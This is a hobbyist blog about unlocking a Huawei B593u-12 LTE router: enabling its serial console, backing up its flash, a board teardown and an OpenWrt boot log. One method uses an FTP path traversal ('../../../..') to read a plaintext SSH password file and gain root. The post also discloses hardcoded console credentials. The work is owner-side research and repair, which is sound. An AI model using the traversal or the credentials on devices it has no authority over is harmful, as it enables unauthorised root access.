Tricky part comes after you have known good software and hardware setup done. You will NOT see anything from device when booted because Huawei has disabled console on both CFE bootloader and Linux side. Luckily there's fix for that.


Method 1. This works even if you don't have root shell access to device over SSH. This is also the risky way, use method 2 whenever possible. Because it's inevitable that we got a badass over there reading this better that I document this as well.

DO NOT CONTINUE WITHOUT WORKING SERIAL PORT. YOU WON'T GET BACK TO NORMAL MODE FROM RECOVERY MODE WITHOUT ONE!

Unplug any USB devices if connected. Press and hold down all three buttons on side (WLAN, RESET, WPS). Turn power on. All leds turn on. Keep still pressing all three buttons. Release when all leds except power led turn off.

Within few seconds you'll see typical Linux boot messages scrolling on screen and WPS led starts flashing. If you don't see anything on screen but WPS led flashes then device is in recovery mode (running B593-small.trx) but your serial port wiring or software side is incorrectly setup.

Anyway, now you're in root shell. Next we want to enable serial port also in CFE. Simply type following commands to change NVRAM settings.

# Enable CFE and normal boot (B593.trx) serial console
nvram set console_disable=0

# Enable boot_wait with 10 second delay for more recovery options
nvram set boot_wait=on
nvram set wait_time=10

# Boot regular OS (B593.trx). Use boot_part=1 for recovery OS (B593-small.trx)
nvram set boot_part=0

# Write changes made to NVRAM
nvram commit

Now you can simply power cycle device or reboot from OS. On next boot both CFE and OS serial console is working.


Method 2. This is the way you should use, I've tested this with Polkomtel SP103 firmware so upgrade/downgrade to SP103 in case you run into problems following steps below. I didn't and spent way too much time fixing mess I ended up with method 1. :)

Boot device normally.
Plug in FAT32 or NTFS formatted USB memory stick.
Login to management as admin.
Select USB Management > Server Settings on left hand panel.
Enable FTP server and click submit.
Select USB Management > User Settings.
Create new user by clicking Add Items.
Type ../../../.. in Directory field and enable Read-Write access.

Open FTP connection to device and download /var/sshusers.cfg file.
Your SSH admin password is in plaintext right there: admin:PASSWORD:0. Ignore second "user" line.

Open SSH connection to device, login as "admin" with password from sshusers.cfg
Now you're in "ATP" shell.
Type "shell" to open busybox root shell.

Next we make FULL backup of system so we have something to recover device with if we screw up. There's 16MB SPI flash and 256MB NAND USB flash onboard. We'll take backup of both so make sure your USB memory stick (which should be still plugged in) has as around 300MB free space.

For SPI flash we'll use Huawei "flashtest" binary. Folder where USB memory stick is mounted varies, below it's usb1_1 but yours might be usb2_1. Check this first.

# flashtest info
 flash  block  size  :  0x40000 (256k Bytes)
  flash  block  num   :  0x40 (64 Blocks)
  flash  total  size  :  0x1000000 (16M Bytes)
  flash  partation  info : 
  --------------------------------------------------------------- 
  Name                  Address                    Usage 
 --------------------------------------------------------------- 
  Boot                  0x0---0x40000            Bootloader 
  Image             0x40000---0xA40000           Main  image 
  Image            0xA40000---0xE00000           Subject  image 
  Curcfg           0xE00000---0xE40000           Curcent  config 
  Faccfg           0xE40000---0xE80000           Factury  config 
  Tmpcfg           0xE80000---0xF00000           Temp  config 
  Fixcfg           0xF00000---0xF40000           Fixed  config 
  Logcfg           0xF40000---0xF80000           Log  config 
  TR069            0xF80000---0xFC0000           TR069  cert 
  Nvram            0xFC0000---0xFFFFFF           Nvram 

# Wholeflash
flashtest export 000000 16777216
mv /tmp/flashinfo.bin /mnt/usb1_1/0x000000-0xffffff.wholeflash

# Boot / Bootloader
flashtest export 000000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0x000000-0x040000.bootloader

# Image / Main  image
flashtest export 040000 10485760
mv /tmp/flashinfo.bin /mnt/usb1_1/0x040000-0xa40000.mainimage

# Image / Subject  image
flashtest export a40000 3932160
mv /tmp/flashinfo.bin /mnt/usb1_1/0xa40000-0xe00000.subjectimage

# Curcfg / Curcent  config
flashtest export e00000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xe00000-0xe40000.currentconfig

# Faccfg / Factury  config
flashtest export e40000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xe40000-0xe80000.factoryconfig

# Tmpcfg / Temp  config
flashtest export e80000 524288
mv /tmp/flashinfo.bin /mnt/usb1_1/0xe80000-0xf00000.tempconfig

# Fixcfg / Fixed  config
flashtest export f00000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xf00000-0xf40000.fixedconfig

# Logcfg / Log  config
flashtest export f40000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xf40000-0xf80000.logconfig

# TR069 / TR069  cert
flashtest export f80000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xf80000-0xfc0000.tr069cert

# Nvram / Nvram
flashtest export fc0000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xfc0000-0xffffff.nvram

Next we use dd to create backup of NAND flash which is simply on-board integrated USB memory stick. Stock OS calls it /dev/nandflash but it's also accessible as /dev/sda0.

# NAND flash backup
dd bs=4k if=/dev/nandflash of=/mnt/usb1_1/nandflash.bin

Now when we have clean state backed up we can continue with NVRAM change that enabled serial console.

# Enable CFE and normal boot (B593.trx) serial console
nvram set console_disable=0

# Enable boot_wait with 10 second delay for more recovery options
nvram set boot_wait=on
nvram set wait_time=10

# Boot regular OS (B593.trx). Use boot_part=1 for recovery OS (B593-small.trx)
nvram set boot_part=0

# Write changes made to NVRAM
nvram commit

And that's it.

P.S. Serial console login is "admin" and password "HW4GCPE". Internally /bin/console aka /bin/cli converts "admin" to "Happy" and "HW4GCPE" to "tonight" then performing strncmp. WTF?



What's inside Huawei B593u-12 LTE router?

There ain't many pictures showing innards of B593u around and even less ones with any details. This obviously needs to be fixed.

Two screws on bottom.

Warranty void stickers covering them.

One screw on back between external antenna connectors.

Board front.
- Internal on-board LTE antennas on top left and top right
- External LTE antenna connectors on top left and top right
- Small black ICs next to antenna connectors are GPIO controlled RF switches allowing software selection between internal and external antennas
- LTE module EM920u-12 on center (minipcie socketed)
- SIM card socket on middle left
- Power button on left under SIM card socket
- Side USB port bottom left
- Power input bottom left
- Rear USB port on right of it
- Two VoIP ports between on bottom center and their driver chips on top of them
- Four yellow Ethernet LAN ports on bottom right
- Ethernet magnetics between LAN ports and LTE module
- On-board WLAN antennas on bottom right corner
- Three buttons on lower right side, from bottom to top WLAN, RESET and WPS
- On left of buttons there's Broadcom BCM5358 SoC, Spansion 16MiB SPI flash and Hynix 128MB DRAM
- Above these is 256MiB NAND flash connected over internal USB bus
- Left to NAND flash is two serial ports which DO NOT work despite promising silkscreen labels
- On top of NAND flash is JTAG port, haven't tested but all compoments appear to be there


Back of the board.
 - Serial console is on top left right below JTAG. Four solder tabs without thru board holes.


Link to full album.

Tuesday, August 12, 2014

Well, that was easy

I think ethernet switch and wireless aren't supported by opensource drivers so even with OpenWrt booting on Huawei B593u-12 it's not much use. USB connected LTE module is not detected, my guess is that some GPIO needs to be toggled to enable it. PCA9555 GPIO expander would need some work too. Also 256MB NAND-flash is missing, only 16MB SPI flash is found.

CFE version 5.60.120.9  based on BBP 1.0.37 for BCM947XX (32bit,SP,LE)
Build Date: Tue Mar 20 05:49:24 HKT 2012 (wzq@cpe)
Copyright (C) 2000-2008 Broadcom Corporation.

Init Arena
Init Devs.
Boot partition size = 262144(0x40000)
Sflash type : 0x100 ; Sflash devid : 0x17 ; Sflash manuid : 0x1
Found a 16MB SPANSION serial flash
pca9555 init data 0x00
Found pca9555
pca9555 0x02 hw_verion 0x01
et0: Broadcom BCM47XX 10/100/1000 Mbps Ethernet Controller 5.60.120.9 
CPU type 0x19749: 500MHz
Tot mem: 131072 KBytes

CFE mem:    0x80700000 - 0x8079CA90 (641680)
Data:       0x80732950 - 0x80735AB0 (12640)
BSS:        0x80735AB0 - 0x80736A90 (4064)
Heap:       0x80736A90 - 0x8079AA90 (409600)
Stack:      0x8079AA90 - 0x8079CA90 (8192)
Text:       0x80700000 - 0x80732950 (207184)

Device eth0:  hwaddr E8-CD-2D-72-15-CF, ipaddr 192.168.1.1, mask 255.255.255.0
        gateway not set, nameserver not set
gpio 26 value 0x1
gpio 25 value 0x1
cur_part is 0
product_name : B593-U12
plt_version : V100R003C03B008
sw_version : V100R001C00SP999
hw_version : Ver.B
modem_version : 11.999.00.00.00
Loader:raw Filesys:tftp Dev:eth0 File:: Options:(null)
Loading: Failed.
Could not load :: Timeout occured
boot_part now 0
Loader:raw Filesys:raw Dev:flash0.os File: Options:(null)
Loading: .. 3712 bytes read
Entry at 0x80001000
Closing network.
Starting program at 0x80001000
[    0.000000] Linux version 3.14.16 (bobbuilder@openb593) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r42110) ) #3 Tue Aug 12 01:25:33 EEST 2014
[    0.000000] CPU0 revision is: 00019749 (MIPS 74Kc)
[    0.000000] bcm47xx: using bcma bus
[    0.000000] bcma: bus0: Found chip with id 0x5357, rev 0x02 and package 0x09
[    0.000000] bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x26, class 0x0)
[    0.000000] bcma: bus0: Core 3 found: MIPS 74K (manuf 0x4A7, id 0x82C, rev 0x04, class 0x0)
[    0.000000] bcma: bus0: Found M25FL128 serial flash (size: 16384KiB, blocksize: 0x10000, blocks: 256)
[    0.000000] bcma: bus0: Early bus registered
[    0.000000] MIPS: machine is Unknown Board
[    0.000000] Determined physical RAM map:
[    0.000000]  memory: 07fff000 @ 00000000 (usable)
[    0.000000] Initrd not found or empty - disabling initrd
[    0.000000] Zone ranges:
[    0.000000]   Normal   [mem 0x00000000-0x07ffefff]
[    0.000000]   HighMem  empty
[    0.000000] Movable zone start for each node
[    0.000000] Early memory node ranges
[    0.000000]   node   0: [mem 0x00000000-0x07ffefff]
[    0.000000] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[    0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[    0.000000] Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 32511
[    0.000000] Kernel command line:  noinitrd console=ttyS0,115200
[    0.000000] PID hash table entries: 512 (order: -1, 2048 bytes)
[    0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
[    0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
[    0.000000] Writing ErrCtl register=00000000
[    0.000000] Readback ErrCtl register=00000000
[    0.000000] Memory: 126468K/131068K available (2393K kernel code, 108K rwdata, 476K rodata, 144K init, 248K bss, 4600K reserved, 0K highmem)
[    0.000000] NR_IRQS:128
[    0.000000] Setting up vectored interrupts
[    0.060000] Calibrating delay loop... 249.44 BogoMIPS (lpj=1247232)
[    0.070000] pid_max: default: 32768 minimum: 301
[    0.070000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[    0.070000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[    0.070000] NET: Registered protocol family 16
[    0.090000] bio: create slab <bio-0> at 0
[    0.090000] Switched to clocksource MIPS
[    0.100000] NET: Registered protocol family 2
[    0.100000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[    0.100000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[    0.100000] TCP: Hash tables configured (established 1024 bind 1024)
[    0.100000] TCP: reno registered
[    0.100000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[    0.100000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[    0.100000] NET: Registered protocol family 1
[    0.100000] bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x1C, class 0x0)
[    0.100000] bcma: bus0: Core 2 found: GBit MAC (manuf 0x4BF, id 0x82D, rev 0x03, class 0x0)
[    0.100000] bcma: bus0: Core 4 found: USB 2.0 Host (manuf 0x4BF, id 0x819, rev 0x05, class 0x0)
[    0.100000] bcma: bus0: Core 5 found: DDR1/DDR2 Memory Controller (manuf 0x4BF, id 0x82E, rev 0x02, class 0x0)
[    0.100000] bcma: bus0: Core 6 found: I2S (manuf 0x4BF, id 0x834, rev 0x02, class 0x0)
[    0.100000] bcma: bus0: Core 7 found: Internal Memory (manuf 0x4BF, id 0x80E, rev 0x0B, class 0x0)
[    0.110000] can not parse nvram name sb/1/rxpo2g(null) with value 0xff got -34
[    0.110000] can not parse nvram name sb/1/ag2(null) with value 0xff got -34
[    0.110000] can not parse nvram name sb/1/ag3(null) with value 0xff got -34
[    0.160000] bcma: bus0: Bus registered
[    0.160000] futex hash table entries: 256 (order: -1, 3072 bytes)
[    0.160000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[    0.170000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[    0.170000] msgmni has been set to 247
[    0.170000] io scheduler noop registered
[    0.170000] io scheduler deadline registered (default)
[    0.170000] Serial: 8250/16550 driver, 2 ports, IRQ sharing enabled
[    0.190000] serial8250.0: ttyS0 at MMIO 0xb8000300 (irq = 2, base_baud = 1250000) is a U6_16550A
[    0.580000] console [ttyS0] enabled
[    0.720000] 9 bcm47xxpart partitions found on MTD device bcm47xxsflash
[    0.720000] Creating 9 MTD partitions on "bcm47xxsflash":
[    0.730000] 0x000000000000-0x000000040000 : "boot"
[    0.740000] 0x000000040000-0x00000004001c : "firmware"
[    0.740000] 0x00000004001c-0x0000000409e0 : "loader"
[    0.750000] 0x0000000409e0-0x00000014c800 : "linux"
[    0.760000] mtd: partition "linux" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only
[    0.770000] 0x00000014c800-0x000000a40000 : "rootfs"
[    0.780000] mtd: partition "rootfs" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only
[    0.790000] mtd: device 4 (rootfs) set to be root filesystem
[    0.800000] mtd: partition "rootfs_data" created automatically, ofs=0x490000, len=0x5b0000
[    0.810000] 0x000000490000-0x000000a40000 : "rootfs_data"
[    0.820000] 0x000000a40000-0x000000ff0000 : "firmware"
[    0.820000] 0x000000a4011c-0x000000ba14e8 : "linux"
[    0.830000] mtd: partition "linux" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only
[    0.840000] 0x000000ba14e8-0x000000ff0000 : "rootfs"
[    0.850000] mtd: partition "rootfs" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only

[    0.870000] 0x000000ff0000-0x000001000000 : "nvram"
[    0.880000] bgmac bcma0:1: Found PHY addr: 30 (NOREGS)
[    0.890000] bgmac bcma0:1: Support for Roboswitch not implemented
[    0.900000] libphy: bgmac mii bus: probed
[    0.980000] b53_common: found switch: BCM5325, rev 4
[    0.990000] bgmac: Broadcom 47xx GBit MAC driver loaded
[    1.000000] bcm47xx-wdt bcm47xx-wdt.0: BCM47xx Watchdog Timer enabled (30 seconds)
[    1.010000] TCP: cubic registered
[    1.010000] NET: Registered protocol family 17
[    1.020000] 8021q: 802.1Q VLAN Support v1.8
[    1.030000] VFS: Mounted root (squashfs filesystem) readonly on device 31:4.
[    1.040000] Freeing unused kernel memory: 144K (802ec000 - 80310000)
procd: Console is alive
procd: - watchdog -
[    5.170000] usbcore: registered new interface driver usbfs
[    5.180000] usbcore: registered new interface driver hub
[    5.180000] usbcore: registered new device driver usb
[    5.200000] SCSI subsystem initialized
[    5.220000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[    5.230000] ehci-platform: EHCI generic platform driver
[    5.230000] ehci-platform ehci-platform.0: EHCI Host Controller
[    5.240000] ehci-platform ehci-platform.0: new USB bus registered, assigned bus number 1
[    5.250000] ehci-platform ehci-platform.0: irq 5, io mem 0x18004000
[    5.270000] ehci-platform ehci-platform.0: USB 2.0 started, EHCI 1.00
[    5.270000] hub 1-0:1.0: USB hub found
[    5.280000] hub 1-0:1.0: 2 ports detected
procd: - preinit -
[    5.870000] usb 1-1: new high-speed USB device number 2 using ehci-platform
[    5.920000] random: mktemp urandom read with 59 bits of entropy available
Press the [f] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level
[    6.020000] hub 1-1:1.0: USB hub found
[    6.020000] hub 1-1:1.0: 4 ports detected
[    6.310000] usb 1-1.1: new high-speed USB device number 3 using ehci-platform
f
- failsafe -


BusyBox v1.22.1 (2014-08-10 22:19:11 EEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

ash: can't access tty; job control turned off
  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 CHAOS CALMER (Bleeding Edge, r42110)
 -----------------------------------------------------
  * 1 1/2 oz Gin            Shake with a glassful
  * 1/4 oz Triple Sec       of broken ice and pour
  * 3/4 oz Lime Juice       unstrained into a goblet.
  * 1 1/2 oz Orange Juice
  * 1 tsp. Grenadine Syrup
 -----------------------------------------------------
root@(none):/# 
root@(none):/# uname -a
Linux (none) 3.14.16 #3 Tue Aug 12 01:25:33 EEST 2014 mips GNU/Linux
root@(none):/# cat /proroot@(none):/# cat /proc/cpuiroot@(none):/# cat /proc/cpuinfo 
system type             : Broadcom BCM5357
machine                 : Unknown Board

processor               : 0
cpu model               : MIPS 74Kc V4.9
BogoMIPS                : 249.44
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 64
extra interrupt vector  : yes
hardware watchpoint     : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
isa                     : mips1 mips2 mips32r1 mips32r2
ASEs implemented        : mips16 dsp dsp2
shadow register sets    : 1
kscratch registers      : 0
core                    : 0
VCED exceptions         : not available
VCEI exceptions         : not available

root@(none):/# cat /proroot@(none):/# cat /proc/mtroot@(none):/# cat /proc/mtd 
dev:    size   erasesize  name
mtd0: 00040000 00010000 "boot"
mtd1: 0000001c 0000001c "firmware"
mtd2: 000009c4 000009c4 "loader"
mtd3: 0010be20 00010000 "linux"
mtd4: 008f3800 00010000 "rootfs"
mtd5: 005b0000 00010000 "rootfs_data"
mtd6: 005b0000 00010000 "firmware"
mtd7: 001613cc 00010000 "linux"
mtd8: 0044eb18 00010000 "rootfs"
mtd9: 00010000 00010000 "nvram"
root@(none):/# free
             total         used         free       shared      buffers
Mem:        126612        12928       113684            0         1900
-/+ buffers:              11028       115584
Swap:            0            0            0
root@(none):/# modprobe b43
[   26.940000] Loading modules backported from Linux version master-2014-05-22-0-gf2032ea
[   26.940000] Backport generated by backports.git backports-20140320-37-g5c33da0
[   26.970000] cfg80211: Calling CRDA to update world regulatory domain
[   26.990000] cfg80211: World regulatory domain updated:
[   26.990000] cfg80211:  DFS Master region: unset
[   26.990000] cfg80211:   (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
[   27.000000] cfg80211:   (2402000 KHz - 2472000 KHz @ 40000 KHz), (N/A, 2000 mBm), (N/A)
[   27.010000] cfg80211:   (2457000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 2000 mBm), (N/A)
[   27.020000] cfg80211:   (2474000 KHz - 2494000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[   27.030000] cfg80211:   (5170000 KHz - 5250000 KHz @ 160000 KHz), (N/A, 2000 mBm), (N/A)
[   27.040000] cfg80211:   (5250000 KHz - 5330000 KHz @ 160000 KHz), (N/A, 2000 mBm), (0 s)
[   27.050000] cfg80211:   (5490000 KHz - 5730000 KHz @ 160000 KHz), (N/A, 2000 mBm), (0 s)
[   27.050000] cfg80211:   (5735000 KHz - 5835000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
[   27.060000] cfg80211:   (57240000 KHz - 63720000 KHz @ 2160000 KHz), (N/A, 0 mBm), (N/A)
[   27.120000] b43-phy0: Broadcom 5357 WLAN found (core revision 28)
[   27.130000] b43-phy0: Found PHY: Analog 9, Type 4 (N), Revision 9
[   27.130000] b43-phy0 ERROR: FOUND UNSUPPORTED RADIO (Manuf 0x17F, ID 0x2057, Revision 5, Version 2)
[   27.140000] b43: probe of bcma0:0 failed with error -122
[   27.150000] Broadcom 43xx driver loaded [ Features: NL ]

root@(none):/#